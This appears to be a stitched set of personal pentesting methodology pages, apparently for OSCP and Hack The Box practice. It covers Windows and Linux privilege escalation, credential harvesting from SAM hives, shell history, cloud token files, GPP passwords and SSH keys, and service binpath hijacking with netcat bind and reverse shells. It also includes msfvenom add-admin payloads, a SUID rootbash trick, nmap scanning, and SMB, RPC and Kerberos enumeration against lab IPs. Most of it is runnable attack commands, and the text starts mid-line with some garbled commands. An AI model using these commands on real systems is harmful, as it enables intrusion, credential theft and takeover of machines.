-p s3cr3tP@ss * Creds from Powershell History Copy type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt cat (Get-PSReadlineOption).HistorySavePath cat (Get-PSReadlineOption).HistorySavePath | sls passw * Copy Get-Item -path -Stream * Get-Content -path -Stream * SAM & SYSTEM bak Copy # Usually %SYSTEMROOT% = C:\Windows %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system * Cloud credentials Copy # From user home .aws\credentials AppData\Roaming\gcloud\credentials.db AppData\Roaming\gcloud\legacy_credentials AppData\Roaming\gcloud\access_tokens.db .azure\accessTokens.json .azure\azureProfile.json * Copy # Before Vista look inside C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history # After Vista look inside C:\ProgramData\Microsoft\Group Policy\history # Look for Groups.xml Services.xml Scheduledtasks.xml DataSources.xml Printers.xml Drives.xml # Decrypt the passwords with gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw * Saved RDP connections Copy HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\ HKCU\Software\Microsoft\Terminal Server Client\Servers\ * Remote desktop credential manager Copy %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings * SCClient \\ SCCM Copy # Check if the retrieved sotfwares are vulnerable to DLL Sideloading # https://github.com/enjoiz/Privesc $result = Get-WmiObject -Namespace "root\\ccm\\clientSDK" -Class CCM\_Application -Property * | select Name,SoftwareVersion if ($result) { $result } else { Write "Not Installed." } * Check recycle bin #### [](#exploit) Exploit * Services running on localhost * Kernel version Copy # List of exploits kernel https://github.com/SecWiki/windows-kernel-exploits # to cross compile a program from Kali $ i586-mingw32msvc-gcc -o adduser.exe useradd.c * Software versions * Service versions #### [](#misconfiguration) Misconfiguration * Services * Can we restart the machine? * Can we start and stop the service? * Check permissions Copy # using sc sc qc # using accesschk.exe accesschk.exe -ucqv accesschk.exe -uwcqv "Authenticated Users" * /accepteula accesschk.exe -uwcqv %USERNAME% * /accepteula accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version # using msf exploit/windows/local/service_permissions * Unquoted Service Path Copy wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\" |findstr /i /v "" wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\Windows\system32\" |findstr /i /v "" #Not only auto services for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo. ) ) gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '*'} | select PathName,DisplayName,Name # find them using msf exploit/windows/local/trusted_service_path # generate service binary with msfvenom msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe * Change service binary path Copy # if the group "Authenticated users" has SERVICE_ALL_ACCESS # it can modify the binary path # bind shell sc config binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe" # reverse shell sc config binpath= "cmd \c C:\Users\nc.exe 4444 -e cmd.exe" # add user to local admin group sc config binpath= "net localgroup administrators username /add" # example using SSDPRV sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe" # then restart the service wmic service NAMEOFSERVICE call startservice net stop [service name] && net start [service name] * DLL Hijacking / Overwrite service binary Copy for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\" # do it by using sc sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt * Registry modify permissions Copy reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services #Try to write every service with its current content (to check if you have write permissions) for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i " Users Path Everyone" # if Authenticated Users or NT AUTHORITY\INTERACTIVE have FullControl # it can be leveraged to change the binary path inside the registry reg add HKLM\SYSTEM\CurrentControlSet\srevices\ /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f * Installed applications * DLL Hijacking for installed applications Copy dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" reg query HKEY_LOCAL_MACHINE\SOFTWARE Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name * Write permissions Copy # using accesschk.exe accesschk.exe /accepteula # Find all weak folder permissions per drive. accesschk.exe -uwdqs Users c:\ accesschk.exe -uwdqs "Authenticated Users" c:\ accesschk.exe -uwdqs "Everyone" c:\ # Find all weak file permissions per drive. accesschk.exe -uwqs Users c:\*.* accesschk.exe -uwqs "Authenticated Users" c:\*.* accesschk.exe -uwdqs "Everyone" c:\*.* # using icalcs icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%" icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%" # using Powershell Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}} * PATH DLL Hijacking Copy # having write permissions inside a folder present ON PATH could bring to DLL hijacking for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) * AlwaysInstallElevated set in Registry Copy # if both are enabled (set to 0x1), it's possible to execute # any .msi as NT AUTHORITY\SYSTEM reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # check with msf exploit/windows/local/always_install_elevated # generate payload with msfvenom # no uac format msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi # using the msiexec the uac wont be prompted msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi # install .msi msiexec /quiet /qn /i C:\Users\Homer.NUCLEAR\Downloads\donuts.msi * Scheduled tasks Copy # using schtasks schtasks /query /fo LIST /v # filtering the output schtasks /query /fo LIST /v | findstr /v "\Microsoft" # using powershell Get-ScheduledTask | ft TaskName,TaskPath,State # filtering the output Get-ScheduledTask | where {$_.TaskPath -nolike "\Microsoft*"} | ft TaskName,TaskPath,State * Executable file writeable * Dependency writeable * Sensitive files readable * SAM Hive * SYSTEM Hive * Windows Subsystem For Linux Copy wsl whoami ./ubuntum2004.exe config --default-user root wsl whoami wsl python -c 'put here your command' * Navigate to the fileystem and look for weird folders that contain weird scripts that run every so often, replace them if we can. #### [](#linux) Linux Principles to becoming root! 1. cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash 2. Adding a new user 3. Make the user run commands without needing password sudo -l * Upgrade shell using socat, else python * Are we in a dock container? If so this can be seen by doing an ls -la. See how to escape from the notes * Run linpeas.sh * Run SUDO Killer if we have full SSH creds * Run SUI3Emum * Go Thru the linpeas.sh output * PwnKit? This is an easy win. * enumerate users * Look for other users * Try to switch users and rerun enumeration * Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret) * Enumerate groups * Are these exploitable? * lxd * davfs * sudo * fail2ban Any accessible sensitive file? * /etc/passwd * /etc/shadow * /etc/sudoers * Configuration files * /root/.ssh/id\_rsa * entire root folder * Check env info Copy (env || set) 2>/dev/null echo $PATH * Look through SUID set * refer to gtfobins for this * Can we write them? * google everything * LOOK EVEN FOR CUSTOM ONES AND USE THEM! * Are these missing libraries? * Do we have write access to the LD_LIBRARY_PATH? IF yes * Generate our own .so file and paste it in the writable path * Enumerate internal running services * If there is a website play with curl * Are these running as other users that we can become? * If there is a database running we can enuemrate for credentials to test for UDF * mysql -uroot -pdasdasd * Remote port forward if we have SSH access. * Init, init.d systemd Services? * Can we overwrite them? * Can we start or stop the service * Can we reboot the machine? * Check for Cronjobs * Can we overwrite them * Are these missing a library when running? * Can we overwrite the library path * GOOGLE EVERYTHING HERE ,some custom scripts have vulnerable expressions. * Password Search * Try known passwords * Search creds from config files (Try different word other than PASSWORD, e.g: pass, passwd, pwd, user, usr, username, secret, cred, credential, auth, secret): Copy grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null find . -type f -exec grep -i -I "PASSWORD" {} /dev/null locate password | more * Search creds in common files: Copy ls -la /var /var/mail /var/spool/mail * Search creds from local DBs * Search creds from bash history: Copy history cat ~/.bash_history * Search creds from memory: Copy strings /dev/mem -n10 | grep -i PASS * SSH keys: Copy cat ~/.ssh/id_rsa ls ~/.ssh/* find / -name authorized_keys 2> /dev/null find / -name id_rsa 2> /dev/null * Search rsync config file Copy find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \) * Transfer Linux Exploit Suggester * Try the most probable exploits * Enumerate processes that run as root and look for weird things. * use PSPY * Enumerate the file system and see if there are weird files that we can overwrite * check /opt and /srv, expecting to find both empty * you could also try find / -name "\*.py" * Check for weird folders and see if tehre are any bash scripts that we could also modify * python scripts * perl i dont know Check Check Check Check Check Check python, nc , in every motherfucking way Creds from Cached [https://www.exploit-db.com/](https://www.exploit-db.com/) [https://www.cvedetails.com/](https://www.cvedetails.com/) [https://nvd.nist.gov/](https://nvd.nist.gov/) [https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) [https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/code-review-tools](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/code-review-tools) [https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) [https://www.exploit-db.com/](https://www.exploit-db.com/) [https://www.cvedetails.com/](https://www.cvedetails.com/) [https://nvd.nist.gov/](https://nvd.nist.gov/) [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) [alternate data stream](https://owasp.org/www-community/attacks/Windows_alternate_data_stream) [GPP password](https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/) πŸ˜ƒ [![Logo](https://github.com/fluidicon.png)OSCP/recon\_enum\_methodologyπŸ›°.md at main Β· The-Lynx-Team/OSCPGitHub](https://github.com/The-Lynx-Team/OSCP/blob/main/Box%20template/recon_enum_methodology%F0%9F%9B%B0.md) [![Logo](https://github.com/fluidicon.png)OSCP/privesc\_methodologyπŸͺ‚.md at main Β· The-Lynx-Team/OSCPGitHub](https://github.com/The-Lynx-Team/OSCP/blob/main/Box%20template/privesc_methodology%F0%9F%AA%82.md) ![Page cover image](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2Fi.gifer.com%2F4xIr.gif&width=1248&dpr=4&quality=100&sign=71f9d5bd&sv=2) --- # πŸ‘πŸ—¨ Enumeration Cheatsheet | Methodology [PreviousEnumeration](/methodology/readme/enumeration) [NextSNMP Enumeration](/methodology/readme/enumeration/snmp-enumeration) Last updated 2 years ago ### [](#autorecon-multi-target-scan) Autorecon Multi-Target Scan #### [](#multi-target-scan) **Multi-Target Scan** By default, AutoRecon will scan 5 target hosts at the same time but that number can be toggled using the -ct parameter. This is basically the number of targets getting scanned at the same time. To demonstrate, we collected some IP Address in the network and then entered them into a text file. Then used that text file to provide targets to AutoRecon. Copy cat target.txt autorecon -t targets.txt ### [](#tcp) TCP Windows all ports: Copy nmap -Pn -p- --open -sS --min-rate 5000 -vvv -n IP #### [](#udp) UDP Copy nmap -sUV -T4 -F --version-intensity 0 IP ### [](#little-nmap-cheatsheet) Little NMAP CheatSheet Copy The Basic Scan By default Nmap does a standard TCP SYN scan on the top 1000 ports of host. I never really use this by itself. $ nmap host At an absolute minimum, I will get more verbosity using -v or -vv. $ nmap -vv host Target Specification Nmap accepts target specification in loads of different formats including plain IP addresses, CIDR ranges and dash notation. $ nmap hostname $ nmap 123.123.123.123 $ nmap 123.123.123.1/24 $ nmap 123.123.123.1–255 Ping Sweeping If you just want to find which hosts are alive, you can perform a ping scan with -sn $ nmap -sn 123.123.123.1/24 Sometimes, hosts don’t respond to ping. To skip ping checks and just scan the host ports anyway, use -Pn: $ nmap -Pn host Scan Targets in a File To scan a list of hosts from a file, use -iL: $ nmap -iL ./hosts.txt Scan Types There are 9 scan types. The main 2 that you will use are: TCP SYN (-sS) UDP (-sU) The default scan type is TCP SYN. To scan UDP ports use -sU. Other scan types can be useful for stealth or probing firewalls but may sacrifice accuracy or speed. You can find more information about the different nmap scan types here: https://nmap.org/book/man-port-scanning-techniques.html Specifying Ports You can specify which ports to scan with -p. By default, only 1000 ports are scanned. To scan all ports: $ nmap -p 1–65535 host Protip: To scan all ports you can also use nmap -p- host, which is shorthand for nmap -p 1–65535 host. You can also specify a comma separated list with single ports, ranges and specific UDP ports: $ nmap -p 23,23,25,110,80–90,U:53,1000–2000 Version and OS Enumeration When Nmap finds an open port it can probe further to discover what service it is running if you specify -sV. You can set how intense you want the probes to be from 0 (light probe, fast but not accurate) to 9 (try all probes, slow but accurate) $ nmap -sV β€” version-intensity 9 Nmap can guess which operating system a host is running based the scan results. Enable this feature with -O: $ nmap -O host Firewall Evasion It also has extensive firewall evasion functionality. I’ve honestly never used these features but they allow you to do some cool things including spoofing the source address. Output Formats Nmap offers many output formats. Some are better for humans to read, others are better for parsing into other tools. I tend to output scans into all formats using: $ nmap -oA outputfile host Specific options include: -oN Normal -oX XML -oS scr1pt k1dd13 -oG greppable Scan Speed You can also adjust the speed that nmap scans at. using -T<0–5>. A higher number means a higher speed. Higher speed means less accuracy, and vice versa. $ nmap -T3 host Nmap Scripting Engine This is where Nmap gets really interesting! It can also run Lua scripts. These can do pretty much anything. Nmap comes with about 600 of them that perform various vuln scanning and enumeration tasks, but you can also code your own. The location of Lua scripts is: /share/nmap/scripts/* Depending on your setup, you might also find them by running: $ locate *.nse As an example of using Nmap scripts, to check if a host is vulnerable to Eternal Blue, you could run: $ nmap --script=smb-vuln-cve-2017–7494 host Some scripts require arguments, you can specify them with --script-args=n1=v1,n2=v2 etc. To get help on which arguments may be accepted by a script: $ nmap --script-help=scriptname To upgrade your scripts to the latest and greatest, just run: $ nmap --script-updatedb A Nice Alias -A A helpful alias is -A, which will enable OS detection, service version detection, script scanning, and traceroute. nmap -A host My Go-To Command For a thorough scan of a single host, a decent go-to command is: $ nmap -A -p1–65535 -v host πŸ˜ƒ πŸ‘οΈ πŸ‘οΈβ€πŸ—¨οΈ ![](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2Fi0.wp.com%2F1.bp.blogspot.com%2F-wfXbq8UoRxY%2FYFtTJJJO4EI%2FAAAAAAAAu8w%2FOVCziimImWAi40iR1ToZAHuYe8o3lW2QQCLcBGAsYHQ%2Fs16000%2F8.png%3Fw%3D640%26ssl%3D1&width=300&dpr=4&quality=100&sign=731475d7&sv=2) --- # Exploitation | Methodology Exploitation refers to the act of finding a vulnerability and using it to our advantage, in this section I will show different exploits that I have encountered as well as their corresponding vulnerable applications. I will go through the steps of exploitation. [PreviousKerberos Enumeration](/methodology/readme/enumeration/kerberos-enumeration) [NextPasswords Attacks](/methodology/readme/exploitation/passwords-attacks) Last updated 2 years ago πŸ˜ƒ πŸ‘Ί ![Page cover image](https://lyethar.gitbook.io/~gitbook/image?url=https%3A%2F%2Fi.pinimg.com%2Foriginals%2F83%2Fe2%2F46%2F83e2463383db54a44b8b95a0fa4f8984.gif&width=1248&dpr=4&quality=100&sign=f359d3cf&sv=2) --- # Copy of SMBPass Change | Methodology If for some reason we have the same case that happened in Fuse where we sprayed the passwords and it was valid but we needed to change the password to a new one. We can change it using the following command: Copy root@kali# smbpasswd -r 10.10.10.193 bhult Old SMB password: New SMB password: Retype new SMB password: Password changed for user bhult on 10.10.10.193. From here rerun your enumeration. Script if the password changes every minute; refer to the Fuse Box. Copy if echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then echo "Password $pass still good"; else pass=$(date +%s | md5sum | base64 | head -c7; echo .); (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | smbpasswd -r 10.10.10.193 -s bhult; echo "password reset to $pass"; fi; After the fi; we can query any command we want as such. Copy f echo "$pass" | smbclient -L //10.10.10.193 -U bhult 2>/dev/null >/dev/null; then echo "Password $pass still good"; else pass=$(date +%s | md5sum | base64 | head -c7; echo .); (echo 'Fabricorp01'; echo "$pass"; echo "$pass";) | smbpasswd -r 10.10.10.193 -s bhult; echo "password reset to $pass"; fi; rpcclient -U "bhult%${pass}" 10.10.10.193 -c "enumdomusers" | grep -oP '\[.*?\]'| grep "0x" -v | tr -d '[]' > userlist.txt [PreviousSMB Enumeration](/methodology/readme/enumeration/smb-enumeration) [NextWeb Enumeration](/methodology/readme/enumeration/web-enumeration) Last updated 2 years ago πŸ˜ƒ πŸ‘οΈ --- # Enumerating Patterns Trick | Methodology [PreviousMethodology](/methodology/readme/enumeration/web-enumeration/methodology) [NextKerberos Enumeration](/methodology/readme/enumeration/kerberos-enumeration) Last updated 2 years ago Check this to enumerate extentions and then using dirb to enuemrate the valid ones like we did in intelligence as well as makign a list out of htem and then using exiftool to look at hidden users. You could also do this with with BurpSuite. πŸ˜ƒ πŸ‘οΈ --- # RPC Enumeration | Methodology Copy rpcclient -U "" 192.168.105.122 if anonymous is allowed wihout passwordd type enumdomusers enumprinters To make a list out of these users to spray passwords and aeseproast rpcclient -U "" -N -c "enumdomusers" | grep -oP '\[.*?\]' | grep "0x" -v | tr -d '[]' > userlist.txt Authenticated RPCEnumaAuthenticated binary that i got from savitar we just have change the -U "USERNAME%PASSWORD" and take out the -N [PreviousLDAP Enumeration](/methodology/readme/enumeration/ldap-enumeration) [NextDNS Enumeration](/methodology/readme/enumeration/dns-enumeration) Last updated 2 years ago πŸ˜ƒ πŸ‘οΈ --- # Kerberos Enumeration | Methodology [PreviousEnumerating Patterns Trick](/methodology/readme/enumeration/web-enumeration/enumerating-patterns-trick) [NextExploitation](/methodology/readme/exploitation) Last updated 2 years ago ### [](#kerbrute) Kerbrute I had 2 different version of kerbrute that work different so I will label them differently Validating Users Copy kerbrute2 userenum --dc 10.10.10.172 -d MEGABANK.LOCAL userlist2 Validating Users and taking TGTs if they dont have preauth. Copy kerbrute -domain intelligence.htb -users userlist πŸ˜ƒ πŸ‘οΈ [![Logo](https://github.com/fluidicon.png)GitHub - insidetrust/statistically-likely-usernames: Wordlists for creating statistically likely username lists for use in password attacks and security testingGitHub](https://github.com/insidetrust/statistically-likely-usernames) ---